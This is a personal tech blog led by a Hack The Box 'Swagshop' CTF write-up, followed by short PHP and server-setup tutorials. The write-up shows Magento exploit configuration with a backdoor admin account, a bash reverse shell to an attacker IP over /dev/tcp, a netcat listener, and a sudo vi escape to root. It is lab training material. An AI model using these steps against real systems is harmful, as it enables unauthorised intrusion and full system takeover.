Thursday, December 3, 2020

Hack The Box - Swagshop - CTF writeup



So in preparation for the OSCP, and to get better at understanding security vulnerabilities, I have been doing what are commonly referred to as capture the flag (CTF) challenges. Here I will go over a chain of vulnerabilities that allows remote access to a "user.txt" file and a "root.txt" file. The root.txt file can only be acquired remotely if I can gain command execution as the root or system user, and since this is a Linux-based system I will be trying to escalate my privileges up to root so I can control the system and retrieve the file.

The biggest and initial step is enumeration. So far I just know there is a box with an IPv4 address of 10.10.10.140. From the name I can assume this is perhaps a shop of some kind, but that is all the initial information given. In essence this CTF mirrors what you would call black box testing in a security or penetration testing job: perhaps a shop owner is concerned about their security and would like to see what, if anything, could happen if an attacker targeted their site, so they know what to patch or fix ASAP. Let's proceed with initial enumeration. I'll start with Nmap.
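The command I start with is along these lines (the exact flags shown here are representative rather than copied from my notes):

# default scripts, version detection, and save the output for later reference
nmap -sC -sV -oA nmap/swagshop 10.10.10.140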


The initial Nmap scan reveals a common setup. There are two ports open. SSH, or secure shell, is open on port 22 over TCP (the transmission control protocol) and is running OpenSSH 7.2p2. This allows an admin to control the machine remotely, but without credentials I would need to check whether this particular version is vulnerable or patched. Next I see that port 80 is open, served by Apache/2.4.18 on Ubuntu.




Well, that is rather strange. Our initial scan revealed what appears to be a common web server, but we are unable to connect on port 80. Perhaps let me try adding a hostname entry for this IPv4 address to my /etc/hosts file so my local machine will resolve it to the proper address.
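For reference, the change is a single line appended to /etc/hosts (the hostname label here is my own choice; anything works for local resolution):

# map the target IP to a convenient hostname
echo '10.10.10.140   swagshop.htb' | sudo tee -a /etc/hosts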

 
It is still not loading. To double-check that there is data being served, and that it's not an issue with how I am browsing, I like to get manual and use the command line. I made a simple cURL request to see the page.
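Something along these lines, with -i so the response headers are included as well (flags from memory):

# fetch the page manually and show the response headers too
curl -i http://10.10.10.140/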


Nice, now we are getting somewhere. This looks more like what I was expecting to be hosted on port 80. There is a webpage and I can see the store is running Magento and we are indeed looking at an e-commerce site. 

It was a proxy issue: I needed to configure this since in the background I am also using Burp Suite to intercept and analyze requests. That just means I am routing all of the site's traffic through a tool that allows for more manual analysis and testing.



Sometimes trial and error is the best teacher. In fact, the site was not resolving because I was going to https://10.10.10.140 and not http://10.10.10.140. Since this is for practice, the site does not have a proper security certificate, so when trying to access it via https the web browser defaults to port 443, which is unavailable. A request in a browser to http goes to port 80, which is open, and now here we are at the store.





Now when I go to the login page I see an interesting behavior in how the server is handling the request. It is common to see a login served straight from the web root, but here there are path parameters in the URL, which makes sense for a Magento site since every request is routed through its front controller before touching the database on the backend. The URL I get sent to when I attempt to log in is:
http://10.10.10.140/index.php/customer/account/login/. The index.php before the /customer/account/login is of particular interest. Let's keep that in our notes and move forward.

I now want to see what else is on this server so I will use "gobuster" as follows: 
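The invocation was roughly the following; the wordlist and thread count shown here are typical choices rather than the exact ones from my notes:

# brute force directories on the web root
gobuster dir -u http://10.10.10.140/ -w /usr/share/wordlists/dirb/common.txt -t 25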


Ok, /app with a 301 is interesting to me, so I went and explored that folder. Within it I found etc/local.xml (i.e., /app/etc/local.xml). This config file has an install date and a key, so I'll add those to my notes, because keys are usually important if you find them lying around.


Also, the site is using Mage with a copyright date of 2008. Let's check the site to see what version of Magento they are running. Wow, just as I suspected, they are running a very old version of Magento: this store was set up with a 2014 release. It is always important to use the latest versions of software to have the latest patches against dangerous vulnerabilities. This got me thinking that I should see whether I even have to reinvent the wheel here. Ok, this is good, there appear to be quite a few exploits within Metasploit for Magento. Perhaps what we are looking for already exists, which will make this engagement a lot easier than having to code exploits from scratch.

The one that first stands out in the list of potential exploits is the authenticated remote code execution. However, we will have to create an admin user to use that one. Upon doing some quick googling I find that there is also an exploit that allows me to create an admin user. Perfect. So this will be two steps to get the initial shell: first create an admin account I can use, then run that exploit with authenticated credentials to have the remote machine connect back to my testing (attacker) box.

Here below I am looking at the exploit to create a new admin user. A few points to note: the default username:password combination will now be forme:forme. In a real penetration test or red team engagement from a public IP you would want to change this so that an outside attacker doesn't inadvertently use the backdoor you have just created; here I am on a VPN and this is a practice box, so this is fine. Also, upon trying to navigate to the /admin/Cms_Wysiwyg/directive/index/ directory, I see that this is not allowed.





Well this is rather strange. The directory in the exploit doesn't seem to be accessible in this version of Magento on this particular Apache server. This is going to create a big problem because without that working we won't be able to create the new admin account. But then I remembered something critical. 



Do you remember the path parameters from the initial reconnaissance? I tried including index.php before the directory in the url being requested in the exploit and am now granted access to an admin panel. This is great because now that we have a path to access the admin panel we can attempt to run the exploit without it just getting 403 errors from the server. 

Ok, so here is a quick overview of the Python exploit code I will run against this Magento server. As I said before, on a real red team engagement you would want to modify the password for security. Here, for the purpose of this exercise, I am just going to set the target URL and include the path parameter of /index.php.
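The relevant change is sketched below. This is a paraphrase with my own variable names rather than the exploit's exact source, but it captures the idea: the base URL has to carry the index.php path parameter so the Cms_Wysiwyg route resolves.

# Paraphrased sketch of the exploit configuration (Python)
# The base URL must include index.php, otherwise the request is rejected
target = "http://10.10.10.140/index.php/"

# The injection request is sent to the admin Cms_Wysiwyg controller
target_url = target + "admin/Cms_Wysiwyg/directive/index/"

# Credentials the exploit will create for the new admin user
username = "forme"
password = "forme"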



Now it's time for the rubber to meet the road. Let's see if this exploit works.


Excellent! The exploit worked and the first piece of this puzzle is finally falling into place. Let's test it out. We are now successfully logged in as the user "forme". There used to be another exploit that could be run from within this panel, but it has been patched in this version of Magento. So for now let's log out and return to the authenticated RCE code we saw above, now that the program has newly created admin credentials to authenticate with.




Now I will move on to the other Python exploit and see what needs to be modified for this particular scenario. Interestingly enough, it looks like the injected payload calls a PHP function, 'system', which is what allows for the code execution. I configured it with the newly created credentials. This also highlights the importance of reconnaissance and good note taking: the exploit needs the exact install date, and I have that from the local.xml file I found at the beginning in the /app folder. Perfect, this is the missing piece the exploit needs to work against this particular version of Magento. The exact date and time of install are needed to proceed. Here below you can see how I modified the code:
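Roughly, the values that needed filling in were the following; again this is a paraphrase with my own variable names, and the install date is a placeholder standing in for the value copied from local.xml:

# Paraphrased sketch of the values edited in the authenticated RCE exploit (Python)
# Admin credentials created by the previous exploit
username = 'forme'
password = 'forme'

# PHP function used server-side to run the injected command
php_function = 'system'

# Must match the <date> value in /app/etc/local.xml exactly
install_date = '<install date copied from local.xml>'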


Well, that is not what I expected. It doesn't run, and Python is giving an error about no matching control. I see that the module being used is mechanize, so I assume there are some issues with the automated requests being sent by this headless browser of sorts.


Unfortunately, that wasn't quite it. I tried a few variations of the URL, including /index.php and /admin, which seems to have solved that problem. Very cool. I don't want to get into all the debugging details, but suffice it to say there were a few more changes needed to get this code running with a newer version of mechanize than existed when this box was first released. Moving forward, when I tested with the system command 'whoami' I saw that I was getting remote code execution on this system as 'www-data'. This is good, because now I can try to establish a foothold with a shell, even if it is a low-privilege one like the shell assigned to www-data. For good measure, to make sure the script is executing on the server correctly, I retrieve the /etc/passwd file.



This is great, because at this point I am able to execute code on the remote machine. Now, to have more control and possibly escalate my privileges, I need an initial shell, which is an interactive prompt that lets me control the machine remotely. I set up a simple netcat listener but had trouble: it seems a firewall was blocking all my attempts except on port 443, and there was also something particular about the bash nesting needed for this to work. However, as you can see in the screenshots below, I got the first shell and was able to upgrade it to a proper shell using "python3 -c 'import pty; pty.spawn("/bin/bash")'". Then you background the session, adjust the terminal settings, and return to an interactive prompt that now allows editing without freezing or hanging.
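For reference, the sequence looked roughly like this; my attacking IP is shown as a placeholder, and as mentioned the exact quoting took some trial and error:

# on my machine: listen on 443, the only port not blocked
nc -lvnp 443

# sent through the exploit's command execution (note the bash nesting)
bash -c 'bash -i >& /dev/tcp/10.10.14.2/443 0>&1'

# once connected, upgrade to a proper TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
# then Ctrl+Z, and back on the local machine:
stty raw -echo; fg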




This solves the first challenge, and from here it's a matter of just navigating to the user's home directory. In this case the user is named 'haris' and the 'user.txt' file is sitting in their home folder.



Now, from the output above when checking for sudo privileges, I see that this user can run /usr/bin/vi as root and appears to have wildcard access covering /var/www/html/*. So I go ahead and open index.php in vi, which is now a process running as root. Then, instead of doing :wq! to exit, I do :!/bin/bash and am dropped right into the root user's command prompt with full system control and privileges.
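The whole escalation fits in a couple of steps; index.php is just one of the files matched by the wildcard in the sudo rule:

# run vi as root against a file covered by the sudo entry
sudo /usr/bin/vi /var/www/html/index.php

# inside vi, spawn a shell instead of saving and quitting
:!/bin/bash
whoami    # root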


From here it is just a matter of navigating to the correct folder to retrieve the 'root.txt' flag. This was a fun box with some tricky little challenges regarding path parameters in the URL, Python module debugging and, finally, an interesting privilege escalation at the end. I have been learning a lot doing these challenges, and I find there are few things as exciting as getting to be "root".












Tuesday, June 9, 2020

PHP - Sending e-mail data from a server's localhost


This is a fun example I created after following some tutorials on YouTube. I have built SMTP servers in previous examples, but this approach can be used to send e-mails from a webpage to a server for contracts, or for something as simple as a guestbook where an admin would like the system to send automated e-mails to marketing, sales or management teams.

I used the PHPMailer library found on GitHub for the backend processing. For the front page I just made a simple form where the user can send a resume to a recruiter.
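A trimmed-down sketch of the backend handler is below. The SMTP host, credentials and form field names are placeholders rather than the values from my actual page, but the PHPMailer calls are the standard ones.

<?php
// Sketch of the resume form handler using PHPMailer (Composer autoloader assumed)
use PHPMailer\PHPMailer\PHPMailer;
use PHPMailer\PHPMailer\Exception;

require 'vendor/autoload.php';

$mail = new PHPMailer(true);
try {
    // SMTP settings: placeholders, not my real server details
    $mail->isSMTP();
    $mail->Host       = 'smtp.example.com';
    $mail->SMTPAuth   = true;
    $mail->Username   = 'forms@example.com';
    $mail->Password   = 'app-password-here';
    $mail->SMTPSecure = PHPMailer::ENCRYPTION_STARTTLS;
    $mail->Port       = 587;

    // Send from the site's own address; the visitor only appears in Reply-To
    $mail->setFrom('forms@example.com', 'Website form');
    $mail->addReplyTo($_POST['email'], $_POST['name']);
    $mail->addAddress('recruiter@example.com');

    // Attach the uploaded resume from its temporary location
    $mail->addAttachment($_FILES['resume']['tmp_name'], $_FILES['resume']['name']);

    $mail->Subject = 'New resume submission';
    $mail->Body    = $_POST['message'];
    $mail->send();
    echo 'Message sent';
} catch (Exception $e) {
    echo 'Message could not be sent: ' . $mail->ErrorInfo;
}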

         

And don't worry, this won't just let you put any name in the email text box. The e-mails need to come from a legitimate source, such as the secured website where this will be hosted in production. The above was rendered from the code below. Nothing fancy here, just a simple form for submitting attachments.


Success! The form works as intended and I got the test e-mail in my Gmail inbox from my test server.



Wednesday, June 3, 2020

PHP & jQuery - File/image uploader

For this example I created a page where a user can upload files and images to a web server. The items are stored and reflected back so the user can see their multiple uploads. With the PHP below I am handling the uploads, and if the file already exists the user is notified that they are attempting a duplicate upload.


And here is the main work being done by this page: it restricts uploads to images with the extensions .gif, .jpg, .png or .jpeg, and the file size is limited to 500KB.
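A minimal sketch of those checks looks like this; the form field name and upload folder are placeholders rather than necessarily what my page uses.

<?php
// Sketch of the server-side upload checks described above
$targetDir  = 'uploads/';
$fileName   = basename($_FILES['fileToUpload']['name']);
$targetFile = $targetDir . $fileName;
$extension  = strtolower(pathinfo($targetFile, PATHINFO_EXTENSION));

$allowed = ['gif', 'jpg', 'png', 'jpeg'];

if (!in_array($extension, $allowed)) {
    echo 'Sorry, only GIF, JPG, PNG and JPEG files are allowed.';
} elseif ($_FILES['fileToUpload']['size'] > 500000) {            // 500KB limit
    echo 'Sorry, your file is too large.';
} elseif (file_exists($targetFile)) {
    echo 'Sorry, that file already exists.';                     // duplicate upload
} elseif (move_uploaded_file($_FILES['fileToUpload']['tmp_name'], $targetFile)) {
    echo 'The file ' . htmlspecialchars($fileName) . ' has been uploaded.';
} else {
    echo 'Sorry, there was an error uploading your file.';
}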


This is what the page looks like below with a little formatting. The alert below was triggered by trying to upload a file without one of the allowed extensions.



This is now echoing back to the screen the file size restrictions because an excessively large file was being uploaded.

In this block I create the div tags for the "dropZone" above and set the input type to handle the multiple attachments as an array.



And now below you can see what the page looks like after multiple successful image uploads. The completion progress of each file is shown during the upload. With this, a user can upload images to a CRM system for sales, a profile picture for social media, or a variety of other systems. The file types and sizes here were customized, so this same format can be used to upload any file type of any size.



Monday, June 1, 2020

Using Google reCAPTCHA v2

What is a reCAPTCHA? You have seen them online and perhaps have been wondering how they work. I know I have been seeing these for years but didn't really understand them until I saw the process. In this example I don't go into the creation of the system behind reCAPTCHA's, but rather here I am just showing how to use the Google reCAPTCHA v2. I have seen these used ubiquitously all over the internet and I decided to learn what they are and how I can implement them on my own sites to verify that my site's users are indeed people and not bots.

The PHP is pretty standard. I take the user's name from the form, then send the API my secret key, the response key and the user's IP address. I then get the file contents, decode the JSON and verify the user's authenticity.


PHP CODE:
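A minimal sketch of the verification step, assuming the standard v2 widget, looks like this; the secret key is of course a placeholder.

<?php
// Sketch of the reCAPTCHA v2 server-side verification
if (isset($_POST['g-recaptcha-response'])) {
    $secret   = 'YOUR_SECRET_KEY';
    $response = $_POST['g-recaptcha-response'];
    $remoteIp = $_SERVER['REMOTE_ADDR'];

    // Ask Google's siteverify endpoint whether the challenge was solved
    $url    = 'https://www.google.com/recaptcha/api/siteverify'
            . '?secret=' . urlencode($secret)
            . '&response=' . urlencode($response)
            . '&remoteip=' . urlencode($remoteIp);
    $verify = json_decode(file_get_contents($url));

    if ($verify->success) {
        echo 'Verified human. Name captured as: ' . htmlspecialchars($_POST['name']);
    } else {
        echo 'reCAPTCHA verification failed, please try again.';
    }
}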



HTML CODE:

The HTML code for this example is just a simple text box form for a user's name; this could be a username, an email, or even a check that a survey is being taken by a human rather than by a bot. The uses for this are endless, and that is why you can find these all over the internet.



This next part had me stuck for a moment. I had been referencing some old tutorials, and Google has since buttoned down the security here a bit: to get the correct responses the site needs to be served over HTTPS. I quickly added an SSL certificate with Let's Encrypt and now it works properly. Here in this screenshot you can see a simple form box where you can enter your name. Once a user clicks the reCAPTCHA and it verifies that they are not a bot, the request is accepted and I just echo back the user input. For a real application or website I would pipe the output to a database or another page rather than the echo, which is done here for illustrative purposes below.


I included this to show the flow of reCAPTCHA although most people have probably seen this as they explore the internet.

Upon successful completion of the above little exercise, the system determines whether or not a user is authentic. Here, since the reCAPTCHA was completed successfully and I entered my name as 'J', the system tells me it verified that I'm not a bot and that it has captured my name as 'J'. This system is particularly interesting because its initial purpose was to help digitize illegible books, and now it's used to verify users as humans. So not only did I learn some cool PHP tricks while learning how to do this, I also learned a little more about internet history.


Thursday, May 21, 2020

PHP - CSRF tokens

In this example I created a simple CSRF token to validate a user's identity. Obviously the final implementation is going to take more than what I am showing here. But the point here is to understand what CSRF tokens are, how they are created and how they are used.

A CSRF token is unique to each user and is created in a randomized way. It is then used to validate subsequent HTTP requests and make sure the server is exchanging the right data with the correct client. Below in PHP, I start a session, and you can see that the session token tied to each user is produced by wrapping bin2hex() around random_bytes(): random_bytes() cryptographically generates pseudo-random bytes, and bin2hex() converts that binary data into a hexadecimal string, so the token remains unpredictable.
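A minimal sketch of that setup, together with the check performed on submission, looks like this (the 32-byte length and the field names are my choices here):

<?php
// Sketch of session-based CSRF token creation and validation
session_start();

// One unpredictable token per session: cryptographically secure bytes
// from random_bytes(), rendered as a hex string by bin2hex()
if (empty($_SESSION['csrf_token'])) {
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}

// On submission, compare the hidden form field against the session copy
// using a timing-safe comparison before trusting the request
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (hash_equals($_SESSION['csrf_token'], $_POST['csrf_token'] ?? '')) {
        echo 'Your name is: ' . htmlspecialchars($_POST['name']);
    } else {
        echo 'CSRF token mismatch.';
    }
}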



The HTML is a simple submit form where a user enters their name and a CSRF token is then created. Within this code you can see that the CSRF token is hashed with SHA-256 (a hash, not encryption). Then, when the submitted CSRF token matches the one the server issued, the page will reflect "Your name is: (the name you submitted)".


Here is what the output looks like when the name matches the token.


Here is a view from the Console to see what the page is doing. You can see the long encoded csrf value that is created when I enter my name 'Jason'.


Here, since I haven't created anywhere to store values, I am going to manually change the value for illustrative purposes. I now set it to changedValue0101010101. When I click submit, this CSRF token will no longer match the one the server issued and the error message will be displayed.





CSRF tokens are used widely around the internet to ensure safety, and they are a great mechanism for a server to verify that an HTTP request genuinely came from the client it issued the token to rather than from a forged cross-site request.







Wednesday, May 20, 2020

Mouseflow for understanding customers and visitors

I found this today and it's quite interesting. With Mouseflow on a web page I am able to see recorded user sessions. This is particularly interesting because you can fully put yourself in the shoes of your visitors and see exactly how they interacted with a web page. It didn't seem to capture my particles.js particles I put on the test page, but it captured everything else. So it's not perfect but it seems to accurately record all the visitor's movements and actions. 

This is obviously more useful as you analyze thousands of visitors and then clear patterns can be more visible. So by taking into account what parts of a site people hover a mouse over or what they actually click on it gives a direction for what to focus on based on the site's user base.

The installation was quite simple. I included this little javascript tag:

        <!--Mouseflow Test -->
        <script type="text/javascript">
            window._mfq = window._mfq || [];
            (function() {
                var mf = document.createElement("script");
                mf.type = "text/javascript"; mf.defer = true;
                mf.src = "//cdn.mouseflow.com/projects/XX.js";
                document.getElementsByTagName("head")[0].appendChild(mf);
            })();
        </script>

I then activated the test page from the Mouseflow owner account and after I visited the page I was able to see my recorded session. 


Tuesday, May 19, 2020

Using Memcached to store and retrieve session data

I started by creating an Ubuntu VPS. I then installed Memcached from the CLI over SSH from my local machine. I secured the '.conf' file by setting it to listen only on localhost and disabling UDP. I then configured SASL support so that my PHP scripts have to authenticate when connecting to the Memcached backend.


I then added Apache and PHP to the server. Next I created a php info page and put it on the server to view the memcached information. I can see that memcached is installed and is communicating with PHP properly.


 

Next, to get a simple connection working and some data flowing back and forth, I created this simple PHP page with a key. The script opens a new Memcached connection to localhost and gets the requested key; if no key is found, it adds one. On the next refresh, the newly created key, which is a string of text, is retrieved from Memcached.
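A sketch of that page is below; the key name and value are placeholders, but the calls are the standard ones from PHP's memcached extension.

<?php
// Sketch: connect to the local Memcached instance, read a key,
// and seed it if it doesn't exist yet
$memcached = new Memcached();
$memcached->addServer('127.0.0.1', 11211);
// (in the real setup, SASL credentials would also be supplied via setSaslAuthData())

$greeting = $memcached->get('greeting');

if ($greeting === false) {
    // Nothing cached yet, so store a value for the next request (300s TTL)
    $memcached->set('greeting', 'Hello from Memcached!', 300);
    echo 'Key not found in cache; it has been added. Refresh the page.';
} else {
    // Subsequent requests read straight from the cache
    echo 'Retrieved from cache: ' . $greeting;
}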









Wednesday, May 13, 2020

Add cPanel & WHM to CentOS VPS (Log Rotation, Configuring BIND nameserver & Backups...)


For this example I added cPanel & WHM to a CentOS VPS I created. Upon installation of cPanel I did a lot of configurations including setting up the log rotations, a BIND nameserver and backups.

The installation from the command line is simple. The syntax is just a little different from most of the other posts, where I use Ubuntu because that's my favorite Linux distribution. However, I like to use the most efficient tool for the job, and in this case it's CentOS. I have done a fair amount of scripting and automation using CentOS and Vagrant boxes, so this was a cinch.

To install the latest version of cPanel from the command line the commands are as follows:

cd /home
wget -N http://httpupdate.cpanel.net/latest
sh latest
/usr/local/cpanel/cpkeyclt 



From here the most difficult parts are done and the rest is quite intuitive if you've worked with servers and monitoring systems. I added my email and the nameservers to begin with. As you can see below with cPanel it is more about just knowing how to configure the system and you just select your parameters. For example at the bottom of this screen shot you can even select how you want to receive Apache logs. 


Next I was able to configure the Log Rotation. Log rotation is important to not use up all of a system's resources. In this automated process log files are compressed and stored within an archive folder for cPanel.


The cPanel allows for a lot of customization. In a previous blog post I went over how to manually create Cron Jobs: https://jgardnerla.blogspot.com/2020/04/cron-job-daemon-shell-script-to-send.html. However, with cPanel it's very simple to just plug in the days and times you want updates and backups to run. The manual process is good because it allows you to do more customization but this is a good solution if you want simple administration from a GUI.



As simple as cPanel is to use there is a lot it can do. Here I synchronized the server time which is important when serving requests and handling HSTS.

The server is just getting set up, but here are the initial server logs. The system is starting up and the daemons are beginning to listen on their appropriate ports so that they can spring into action when they are needed.


And here is the BIND nameserver starting up successfully.




Now to administer the cPanel I can just return to the secure portal and begin with any customizations or configurations that are required.
